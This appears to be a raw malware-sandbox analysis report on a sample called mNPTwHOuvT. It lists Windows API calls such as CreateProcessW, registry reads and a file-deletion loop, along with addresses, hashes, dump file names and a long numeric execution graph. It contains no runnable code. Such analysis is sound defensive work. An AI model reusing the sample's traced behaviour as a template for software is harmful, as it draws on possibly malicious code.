                                                                                                                                                                                                                                                                                                                            • Opcode ID: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 23858f5f5f858bd20c6f81bae205610dc5c3869b82bfcacec746ad73dc06cfd6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cfe0beae58ad61bea83a9ac8add919dc7b7c61ebe1ef4fe2e37f024ea1666988
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 82E092313001117BF2101B269D8CD677EACDBCA7B2B05013AF645E11E1C6308C10C674
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • IsWindowVisible.USER32(?), ref: 0040492E
                                                                                                                                                                                                                                                                                                                            • CallWindowProcW.USER32(?,00000200,?,?), ref: 0040499C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00403DDB: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057239082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057342113.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057383061.00000000004C7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2057680344.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Window$CallMessageProcSendVisible
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3748168415-3916222277
                                                                                                                                                                                                                                                                                                                            • Opcode ID: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 3c1fd1ddb59456d7d2ea24cd553691e7f5dd8d926ac1a383129e0726a186868e
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c170883d227fca0112a12e156e2c8e9ea80fa6a38e1ecce58c6b14ca94f7736c
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CE118FF1500209ABDF115F65DC44EAB776CAF84365F00803BFA04761A2C37D8D919FA9
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetPrivateProfileStringW.KERNEL32(00000000,00000000,?,?,00002003,00000000), ref: 004027CD
                                                                                                                                                                                                                                                                                                                            • lstrcmpW.KERNEL32(?,?,?,00002003,00000000,000000DD,00000012,00000001), ref: 004027D8
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2057310775.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_mNPTwHOuvT.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: PrivateProfileStringlstrcmp
                                                                                                                                                                                                                                                                                                                            • String ID: !N~
                                                                                                                                                                                                                                                                                                                            • API String ID: 623250636-529124213
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                                                            • Error launching installer, xrefs: 00405C74
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseCreateHandleProcess
                                                                                                                                                                                                                                                                                                                            • String ID: Error launching installer
                                                                                                                                                                                                                                                                                                                            • API String ID: 3712363035-66219284
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                                                            • wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00406113: CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CloseHandlelstrlenwvsprintf
                                                                                                                                                                                                                                                                                                                            • String ID: RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                                                            • API String ID: 3509786178-2769509956
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                                                            • lstrcmpiA.KERNEL32(?,?), ref: 00405E0A
                                                                                                                                                                                                                                                                                                                            • CharNextA.USER32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E1B
                                                                                                                                                                                                                                                                                                                            • lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 190613189-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 6c750b41c95b6ea6b2c0dd9449a28e86abc919c298eb75f697d1220529daba74
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6101864ab16567e6bb9a2a5d9c8424f3785a5e6dd51bc724eb4dc87483e37eb4
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95F0CD31205558FFCB019FA9DC0499FBBA8EF5A350B2544AAE840E7321D234DE019BA4

                                                                                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                                                                                            Execution Coverage:3.3%
                                                                                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                                                                                            Signature Coverage:3.5%
                                                                                                                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                                                                                                                            Total number of Limit Nodes:46
96876 1d7e30 96875->96876 96876->96852 96878 1dc76b 96877->96878 96879 221285 96878->96879 96884 1dc773 messages 96878->96884 96881 1f014b 8 API calls 96879->96881 96880 1dc77a 96880->96854 96882 221291 96881->96882 96884->96880 96885 1dc7e0 8 API calls messages 96884->96885 96885->96884 96886->96348 96887->96352 96889 1dbf73 8 API calls 96888->96889 96890 23dc73 96889->96890 96891 1dbf73 8 API calls 96890->96891 96892 23dc7c 96891->96892 96893 1dbf73 8 API calls 96892->96893 96894 23dc85 96893->96894 96912 1d5851 96894->96912 96899 23dcab 96901 1d568e 8 API calls 96899->96901 96900 1d6b7c 8 API calls 96900->96899 96902 23dcbf FindFirstFileW 96901->96902 96903 23dd4b FindClose 96902->96903 96907 23dcde 96902->96907 96908 23dd56 96903->96908 96904 23dd26 FindNextFileW 96904->96907 96905 1dbed9 8 API calls 96905->96907 96906 1d7bb5 8 API calls 96906->96907 96907->96903 96907->96904 96907->96905 96907->96906 96909 1d6b7c 8 API calls 96907->96909 96908->96362 96910 23dd17 DeleteFileW 96909->96910 96910->96904 96911 23dd42 FindClose 96910->96911 96911->96908 96924 2122d0 96912->96924 96915 1d587d 96917 1d8577 8 API calls 96915->96917 96916 1d5898 96918 1dbd57 8 API calls 96916->96918 96919 1d5889 96917->96919 96918->96919 96926 1d55dc 96919->96926 96922 23eab0 GetFileAttributesW 96923 23dc99 96922->96923 96923->96899 96923->96900 96925 1d585e GetFullPathNameW 96924->96925 96925->96915 96925->96916 96927 1d55ea 96926->96927 96928 1dadf4 8 API calls 96927->96928 96929 1d55fe 96928->96929 96929->96922 96930->96396 96931->96382 96932->96396 96933->96397 96934->96396 96935->96220 96936->96220 96937->96224 96938->96217 96939->96121 96940->96115 96941->96119 96942->96119 96960 1dcf80 96943->96960 96945 1dbfb5 96946 220db6 96945->96946 96947 1dbfc3 96945->96947 96969 1db4c8 8 API calls 96946->96969 96949 1f014b 8 API calls 96947->96949 96951 1dbfd4 96949->96951 96950 220dc1 96952 1dbf73 8 API calls 96951->96952 96953 1dbfde 96952->96953 96954 1dbfed 96953->96954 96955 1dbed9 8 
API calls 96953->96955 96956 1f014b 8 API calls 96954->96956 96955->96954 96957 1dbff7 96956->96957 96968 1dbe7b 39 API calls 96957->96968 96959 1dc01b 96959->96025 96961 1dd1c7 96960->96961 96966 1dcf93 96960->96966 96961->96945 96963 1dd03d 96963->96945 96964 1dbf73 8 API calls 96964->96966 96966->96963 96966->96964 96970 1f05b2 5 API calls __Init_thread_wait 96966->96970 96971 1f0413 29 API calls __onexit 96966->96971 96972 1f0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96966->96972 96968->96959 96969->96950 96970->96966 96971->96966 96972->96966 97461 1e0ebf 97462 1e0ed3 97461->97462 97467 1e1425 97461->97467 97463 1e0ee5 97462->97463 97464 1f014b 8 API calls 97462->97464 97465 22562c 97463->97465 97468 1e0f3e 97463->97468 97494 1db4c8 8 API calls 97463->97494 97464->97463 97495 241b14 8 API calls 97465->97495 97467->97463 97471 1dbed9 8 API calls 97467->97471 97470 1e2b20 207 API calls 97468->97470 97487 1e049d messages 97468->97487 97493 1e0376 messages 97470->97493 97471->97463 97472 22632b 97499 243fe1 81 API calls __wsopen_s 97472->97499 97473 1e1e50 40 API calls 97473->97493 97474 1e1695 97480 1dbed9 8 API calls 97474->97480 97474->97487 97475 1f014b 8 API calls 97475->97493 97477 1dbed9 8 API calls 97477->97493 97478 225cdb 97484 1dbed9 8 API calls 97478->97484 97478->97487 97479 22625a 97498 243fe1 81 API calls __wsopen_s 97479->97498 97480->97487 97483 1e1990 207 API calls 97483->97493 97484->97487 97485 1f05b2 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 97485->97493 97486 1dbf73 8 API calls 97486->97493 97488 1f0413 29 API calls pre_c_initialization 97488->97493 97489 226115 97496 243fe1 81 API calls __wsopen_s 97489->97496 97490 1e0aae messages 97497 243fe1 81 API calls __wsopen_s 97490->97497 97492 1f0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 97492->97493 97493->97472 97493->97473 97493->97474 97493->97475 97493->97477 
97493->97478 97493->97479 97493->97483 97493->97485 97493->97486 97493->97487 97493->97488 97493->97489 97493->97490 97493->97492 97494->97463 97495->97487 97496->97490 97497->97487 97498->97487 97499->97487 96973 1e235c 96980 1e2365 __fread_nolock 96973->96980 96974 1d8ec0 52 API calls 96974->96980 96975 1e1ff7 __fread_nolock 96976 2274e3 96985 2313c8 8 API calls __fread_nolock 96976->96985 96978 2274ef 96978->96975 96983 1dbed9 8 API calls 96978->96983 96979 1e23b6 96982 1d7d74 8 API calls 96979->96982 96980->96974 96980->96975 96980->96976 96980->96979 96981 1f014b 8 API calls 96980->96981 96984 1f017b 8 API calls 96980->96984 96981->96980 96982->96975 96983->96975 96984->96980 96985->96978 97500 208782 97505 20853e 97500->97505 97503 2087aa 97506 20856f try_get_first_available_module 97505->97506 97516 2086b8 97506->97516 97520 1f917b 40 API calls 2 library calls 97506->97520 97508 20876e 97524 202b5c 26 API calls pre_c_initialization 97508->97524 97510 2086c3 97510->97503 97517 210d04 97510->97517 97512 20870c 97512->97516 97521 1f917b 40 API calls 2 library calls 97512->97521 97514 20872b 97514->97516 97522 1f917b 40 API calls 2 library calls 97514->97522 97516->97510 97523 1ff649 20 API calls __dosmaperr 97516->97523 97525 210401 97517->97525 97519 210d1f 97519->97503 97520->97512 97521->97514 97522->97516 97523->97508 97524->97510 97528 21040d ___BuildCatchObject 97525->97528 97526 21041b 97583 1ff649 20 API calls __dosmaperr 97526->97583 97528->97526 97530 210454 97528->97530 97529 210420 97584 202b5c 26 API calls pre_c_initialization 97529->97584 97536 2109db 97530->97536 97535 21042a __wsopen_s 97535->97519 97586 2107af 97536->97586 97539 210a26 97604 205594 97539->97604 97540 210a0d 97618 1ff636 20 API calls __dosmaperr 97540->97618 97543 210a12 97619 1ff649 20 API calls __dosmaperr 97543->97619 97544 210a2b 97545 210a34 97544->97545 97546 210a4b 97544->97546 97620 1ff636 20 API calls __dosmaperr 97545->97620 97617 21071a CreateFileW 97546->97617 97550 
210a39 97621 1ff649 20 API calls __dosmaperr 97550->97621 97552 210b01 GetFileType 97553 210b53 97552->97553 97554 210b0c GetLastError 97552->97554 97626 2054dd 21 API calls 2 library calls 97553->97626 97624 1ff613 20 API calls __dosmaperr 97554->97624 97555 210ad6 GetLastError 97623 1ff613 20 API calls __dosmaperr 97555->97623 97557 210a84 97557->97552 97557->97555 97622 21071a CreateFileW 97557->97622 97559 210b1a CloseHandle 97559->97543 97561 210b43 97559->97561 97625 1ff649 20 API calls __dosmaperr 97561->97625 97563 210ac9 97563->97552 97563->97555 97565 210b74 97567 210bc0 97565->97567 97627 21092b 72 API calls 3 library calls 97565->97627 97566 210b48 97566->97543 97571 210bed 97567->97571 97628 2104cd 72 API calls 3 library calls 97567->97628 97570 210be6 97570->97571 97572 210bfe 97570->97572 97629 208a2e 97571->97629 97574 210478 97572->97574 97575 210c7c CloseHandle 97572->97575 97585 2104a1 LeaveCriticalSection __wsopen_s 97574->97585 97644 21071a CreateFileW 97575->97644 97577 210ca7 97578 210cb1 GetLastError 97577->97578 97579 210cdd 97577->97579 97645 1ff613 20 API calls __dosmaperr 97578->97645 97579->97574 97581 210cbd 97646 2056a6 21 API calls 2 library calls 97581->97646 97583->97529 97584->97535 97585->97535 97587 2107d0 97586->97587 97588 2107ea 97586->97588 97587->97588 97654 1ff649 20 API calls __dosmaperr 97587->97654 97647 21073f 97588->97647 97590 210822 97594 210851 97590->97594 97656 1ff649 20 API calls __dosmaperr 97590->97656 97592 2107df 97655 202b5c 26 API calls pre_c_initialization 97592->97655 97601 2108a4 97594->97601 97658 1fda7d 26 API calls 2 library calls 97594->97658 97597 21089f 97599 21091e 97597->97599 97597->97601 97598 210846 97657 202b5c 26 API calls pre_c_initialization 97598->97657 97659 202b6c 11 API calls _abort 97599->97659 97601->97539 97601->97540 97603 21092a 97605 2055a0 ___BuildCatchObject 97604->97605 97662 2032d1 EnterCriticalSection 97605->97662 97607 2055a7 97608 2055cc 97607->97608 97612 20563a 
EnterCriticalSection 97607->97612 97615 2055ee 97607->97615 97666 205373 97608->97666 97611 205617 __wsopen_s 97611->97544 97614 205647 LeaveCriticalSection 97612->97614 97612->97615 97614->97607 97663 20569d 97615->97663 97617->97557 97618->97543 97619->97574 97620->97550 97621->97543 97622->97563 97623->97543 97624->97559 97625->97566 97626->97565 97627->97567 97628->97570 97630 205737 __wsopen_s 26 API calls 97629->97630 97633 208a3e 97630->97633 97631 208a44 97685 2056a6 21 API calls 2 library calls 97631->97685 97633->97631 97635 205737 __wsopen_s 26 API calls 97633->97635 97643 208a76 97633->97643 97634 208a9c 97637 208abe 97634->97637 97686 1ff613 20 API calls __dosmaperr 97634->97686 97638 208a6d 97635->97638 97636 205737 __wsopen_s 26 API calls 97639 208a82 CloseHandle 97636->97639 97637->97574 97641 205737 __wsopen_s 26 API calls 97638->97641 97639->97631 97642 208a8e GetLastError 97639->97642 97641->97643 97642->97631 97643->97631 97643->97636 97644->97577 97645->97581 97646->97579 97649 210757 97647->97649 97648 210772 97648->97590 97649->97648 97660 1ff649 20 API calls __dosmaperr 97649->97660 97651 210796 97661 202b5c 26 API calls pre_c_initialization 97651->97661 97653 2107a1 97653->97590 97654->97592 97655->97588 97656->97598 97657->97594 97658->97597 97659->97603 97660->97651 97661->97653 97662->97607 97674 203319 LeaveCriticalSection 97663->97674 97665 2056a4 97665->97611 97675 204ff0 97666->97675 97668 205385 97672 205392 97668->97672 97682 203778 11 API calls 2 library calls 97668->97682 97669 202d38 _free 20 API calls 97671 2053e4 97669->97671 97671->97615 97673 2054ba EnterCriticalSection 97671->97673 97672->97669 97673->97615 97674->97665 97681 204ffd __dosmaperr 97675->97681 97676 20503d 97684 1ff649 20 API calls __dosmaperr 97676->97684 97677 205028 RtlAllocateHeap 97678 20503b 97677->97678 97677->97681 97678->97668 97681->97676 97681->97677 97683 1f521d 7 API calls 2 library calls 97681->97683 97682->97668 97683->97681 97684->97678 
97685->97634 97686->97637 96986 1d1098 96991 1d5fc8 96986->96991 96990 1d10a7 96992 1dbf73 8 API calls 96991->96992 96993 1d5fdf GetVersionExW 96992->96993 96994 1d8577 8 API calls 96993->96994 96995 1d602c 96994->96995 96996 1dadf4 8 API calls 96995->96996 97010 1d6062 96995->97010 96997 1d6056 96996->96997 96999 1d55dc 8 API calls 96997->96999 96998 1d611c GetCurrentProcess IsWow64Process 97000 1d6138 96998->97000 96999->97010 97001 215269 GetSystemInfo 97000->97001 97002 1d6150 LoadLibraryA 97000->97002 97003 1d619d GetSystemInfo 97002->97003 97004 1d6161 GetProcAddress 97002->97004 97007 1d6177 97003->97007 97004->97003 97006 1d6171 GetNativeSystemInfo 97004->97006 97005 215224 97006->97007 97008 1d617b FreeLibrary 97007->97008 97009 1d109d 97007->97009 97008->97009 97011 1f0413 29 API calls __onexit 97009->97011 97010->96998 97010->97005 97011->96990 97012 1d105b 97017 1d52a7 97012->97017 97014 1d106a 97048 1f0413 29 API calls __onexit 97014->97048 97016 1d1074 97018 1d52b7 __wsopen_s 97017->97018 97019 1dbf73 8 API calls 97018->97019 97020 1d536d 97019->97020 97049 1d5594 97020->97049 97022 1d5376 97056 1d5238 97022->97056 97025 1d6b7c 8 API calls 97026 1d538f 97025->97026 97062 1d6a7c 97026->97062 97029 1dbf73 8 API calls 97030 1d53a7 97029->97030 97031 1dbd57 8 API calls 97030->97031 97032 1d53b0 RegOpenKeyExW 97031->97032 97033 214be6 RegQueryValueExW 97032->97033 97037 1d53d2 97032->97037 97034 214c03 97033->97034 97035 214c7c RegCloseKey 97033->97035 97036 1f017b 8 API calls 97034->97036 97035->97037 97047 214c8e _wcslen 97035->97047 97038 214c1c 97036->97038 97037->97014 97039 1d423c 8 API calls 97038->97039 97040 214c27 RegQueryValueExW 97039->97040 97041 214c44 97040->97041 97044 214c5e messages 97040->97044 97042 1d8577 8 API calls 97041->97042 97042->97044 97043 1d655e 8 API calls 97043->97047 97044->97035 97045 1db329 8 API calls 97045->97047 97046 1d6a7c 8 API calls 97046->97047 97047->97037 97047->97043 97047->97045 97047->97046 97048->97016 
97050 2122d0 __wsopen_s 97049->97050 97051 1d55a1 GetModuleFileNameW 97050->97051 97052 1db329 8 API calls 97051->97052 97053 1d55c7 97052->97053 97054 1d5851 9 API calls 97053->97054 97055 1d55d1 97054->97055 97055->97022 97057 2122d0 __wsopen_s 97056->97057 97058 1d5245 GetFullPathNameW 97057->97058 97059 1d5267 97058->97059 97060 1d8577 8 API calls 97059->97060 97061 1d5285 97060->97061 97061->97025 97063 1d6a8b 97062->97063 97067 1d6aac __fread_nolock 97062->97067 97065 1f017b 8 API calls 97063->97065 97064 1f014b 8 API calls 97066 1d539e 97064->97066 97065->97067 97066->97029 97067->97064 97687 223c0a 97708 23c819 97687->97708 97689 1defdb 97701 1df450 97689->97701 97690 223c14 97690->97689 97692 23c819 Sleep 97690->97692 97693 223c3f 97690->97693 97714 1eaa65 9 API calls 97690->97714 97692->97690 97694 1db329 8 API calls 97693->97694 97695 223c6f 97694->97695 97696 1dbfa5 39 API calls 97695->97696 97697 223c8b 97696->97697 97715 24446f 8 API calls 97697->97715 97700 1df097 97702 1df46f 97701->97702 97703 1df483 97701->97703 97716 1de960 97702->97716 97748 243fe1 81 API calls __wsopen_s 97703->97748 97705 1df47a 97705->97700 97707 224584 97707->97707 97709 23c83f 97708->97709 97711 23c824 97708->97711 97710 23c86d 97709->97710 97712 23c85b Sleep 97709->97712 97710->97690 97711->97690 97712->97710 97714->97690 97715->97700 97717 1e0340 207 API calls 97716->97717 97721 1de99d 97717->97721 97718 1dea0b messages 97718->97705 97720 1dedd5 97720->97718 97732 1f017b 8 API calls 97720->97732 97721->97718 97721->97720 97722 1deac3 97721->97722 97728 1debb8 97721->97728 97731 1f014b 8 API calls 97721->97731 97734 2231d3 97721->97734 97743 1deb29 __fread_nolock messages 97721->97743 97722->97720 97724 1deace 97722->97724 97723 1decff 97726 2231c4 97723->97726 97727 1ded14 97723->97727 97725 1f014b 8 API calls 97724->97725 97736 1dead5 __fread_nolock 97725->97736 97761 256162 8 API calls 97726->97761 97730 1f014b 8 API calls 97727->97730 97733 1f017b 8 API calls 
97728->97733 97740 1deb6a 97730->97740 97731->97721 97732->97736 97733->97743 97762 243fe1 81 API calls __wsopen_s 97734->97762 97735 1f014b 8 API calls 97737 1deaf6 97735->97737 97736->97735 97736->97737 97737->97743 97749 1dd260 97737->97749 97739 2231b3 97760 243fe1 81 API calls __wsopen_s 97739->97760 97740->97705 97743->97723 97743->97739 97743->97740 97744 22318e 97743->97744 97746 22316c 97743->97746 97757 1d44fe 207 API calls 97743->97757 97759 243fe1 81 API calls __wsopen_s 97744->97759 97758 243fe1 81 API calls __wsopen_s 97746->97758 97748->97707 97750 1dd29a 97749->97750 97751 1dd2c6 97749->97751 97763 1df6d0 97750->97763 97753 1e0340 207 API calls 97751->97753 97754 22184b 97753->97754 97755 1dd2a0 97754->97755 97786 243fe1 81 API calls __wsopen_s 97754->97786 97755->97743 97757->97743 97758->97740 97759->97740 97760->97740 97761->97734 97762->97718 97764 1df710 97763->97764 97781 1df7dc messages 97764->97781 97788 1f05b2 5 API calls __Init_thread_wait 97764->97788 97767 2245d9 97769 1dbf73 8 API calls 97767->97769 97767->97781 97768 1dbf73 8 API calls 97768->97781 97772 2245f3 97769->97772 97770 1dbe2d 39 API calls 97770->97781 97789 1f0413 29 API calls __onexit 97772->97789 97774 2245fd 97790 1f0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97774->97790 97778 1dbed9 8 API calls 97778->97781 97779 1e1ca0 8 API calls 97779->97781 97780 1e0340 207 API calls 97780->97781 97781->97768 97781->97770 97781->97778 97781->97779 97781->97780 97782 243fe1 81 API calls 97781->97782 97783 1dfae1 97781->97783 97787 1eb35c 207 API calls 97781->97787 97791 1f05b2 5 API calls __Init_thread_wait 97781->97791 97792 1f0413 29 API calls __onexit 97781->97792 97793 1f0568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 97781->97793 97794 255231 101 API calls 97781->97794 97795 25731e 207 API calls 97781->97795 97782->97781 97783->97755 97786->97755 97787->97781 97788->97767 97789->97774 97790->97781 97791->97781 97792->97781 97793->97781 
97794->97781 97795->97781 97796 1d36f5 97799 1d370f 97796->97799 97800 1d3726 97799->97800 97801 1d372b 97800->97801 97802 1d378a 97800->97802 97840 1d3788 97800->97840 97806 1d3738 97801->97806 97807 1d3804 PostQuitMessage 97801->97807 97804 213df4 97802->97804 97805 1d3790 97802->97805 97803 1d376f DefWindowProcW 97828 1d3709 97803->97828 97854 1d2f92 10 API calls 97804->97854 97808 1d37bc SetTimer RegisterWindowMessageW 97805->97808 97809 1d3797 97805->97809 97810 213e61 97806->97810 97811 1d3743 97806->97811 97807->97828 97816 1d37e5 CreatePopupMenu 97808->97816 97808->97828 97814 213d95 97809->97814 97815 1d37a0 KillTimer 97809->97815 97857 23c8f7 65 API calls ___scrt_fastfail 97810->97857 97817 1d374d 97811->97817 97818 1d380e 97811->97818 97813 213e15 97855 1ef23c 40 API calls 97813->97855 97823 213dd0 MoveWindow 97814->97823 97824 213d9a 97814->97824 97825 1d3907 Shell_NotifyIconW 97815->97825 97816->97828 97826 1d3758 97817->97826 97832 213e46 97817->97832 97844 1efcad 97818->97844 97820 213e73 97820->97803 97820->97828 97823->97828 97829 213da0 97824->97829 97830 213dbf SetFocus 97824->97830 97831 1d37b3 97825->97831 97827 1d37f2 97826->97827 97834 1d3763 97826->97834 97852 1d381f 75 API calls ___scrt_fastfail 97827->97852 97829->97834 97835 213da9 97829->97835 97830->97828 97851 1d59ff DeleteObject DestroyWindow 97831->97851 97832->97803 97856 231423 8 API calls 97832->97856 97834->97803 97841 1d3907 Shell_NotifyIconW 97834->97841 97853 1d2f92 10 API calls 97835->97853 97838 1d3802 97838->97828 97840->97803 97842 213e3a 97841->97842 97843 1d396b 60 API calls 97842->97843 97843->97840 97845 1efd4b 97844->97845 97846 1efcc5 ___scrt_fastfail 97844->97846 97845->97828 97847 1d61a9 55 API calls 97846->97847 97849 1efcec 97847->97849 97848 1efd34 KillTimer SetTimer 97848->97845 97849->97848 97850 22fe2b Shell_NotifyIconW 97849->97850 97850->97848 97851->97828 97852->97838 97853->97828 97854->97813 97855->97834 97856->97840 97857->97820 97858 2217c8 97859 
2217df 97858->97859 97861 1dd2a0 97859->97861 97862 243fe1 81 API calls __wsopen_s 97859->97862 97861->97861 97862->97861 97863 1d1033 97868 1d68b4 97863->97868 97867 1d1042 97869 1dbf73 8 API calls 97868->97869 97870 1d6922 97869->97870 97876 1d589f 97870->97876 97873 1d69bf 97874 1d1038 97873->97874 97879 1d6b14 8 API calls __fread_nolock 97873->97879 97875 1f0413 29 API calls __onexit 97874->97875 97875->97867 97880 1d58cb 97876->97880 97879->97873 97881 1d58be 97880->97881 97882 1d58d8 97880->97882 97881->97873 97882->97881 97883 1d58df RegOpenKeyExW 97882->97883 97883->97881 97884 1d58f9 RegQueryValueExW 97883->97884 97885 1d592f RegCloseKey 97884->97885 97886 1d591a 97884->97886 97885->97881 97886->97885 97887 1ff06e 97888 1ff07a ___BuildCatchObject 97887->97888 97889 1ff09b 97888->97889 97890 1ff086 97888->97890 97900 1f94fd EnterCriticalSection 97889->97900 97906 1ff649 20 API calls __dosmaperr 97890->97906 97893 1ff08b 97907 202b5c 26 API calls pre_c_initialization 97893->97907 97894 1ff0a7 97901 1ff0db 97894->97901 97899 1ff096 __wsopen_s 97900->97894 97909 1ff106 97901->97909 97903 1ff0e8 97904 1ff0b4 97903->97904 97929 1ff649 20 API calls __dosmaperr 97903->97929 97908 1ff0d1 LeaveCriticalSection __fread_nolock 97904->97908 97906->97893 97907->97899 97908->97899 97910 1ff12e 97909->97910 97911 1ff114 97909->97911 97913 1fdcc5 __fread_nolock 26 API calls 97910->97913 97933 1ff649 20 API calls __dosmaperr 97911->97933 97915 1ff137 97913->97915 97914 1ff119 97934 202b5c 26 API calls pre_c_initialization 97914->97934 97930 209789 97915->97930 97919 1ff23b 97920 1ff248 97919->97920 97925 1ff1ee 97919->97925 97936 1ff649 20 API calls __dosmaperr 97920->97936 97921 1ff1bf 97923 1ff1dc 97921->97923 97921->97925 97935 1ff41f 31 API calls 4 library calls 97923->97935 97928 1ff124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 97925->97928 97937 1ff29b 30 API calls 2 library calls 97925->97937 97926 1ff1e6 97926->97928 97928->97903 97929->97904 97938 209606 
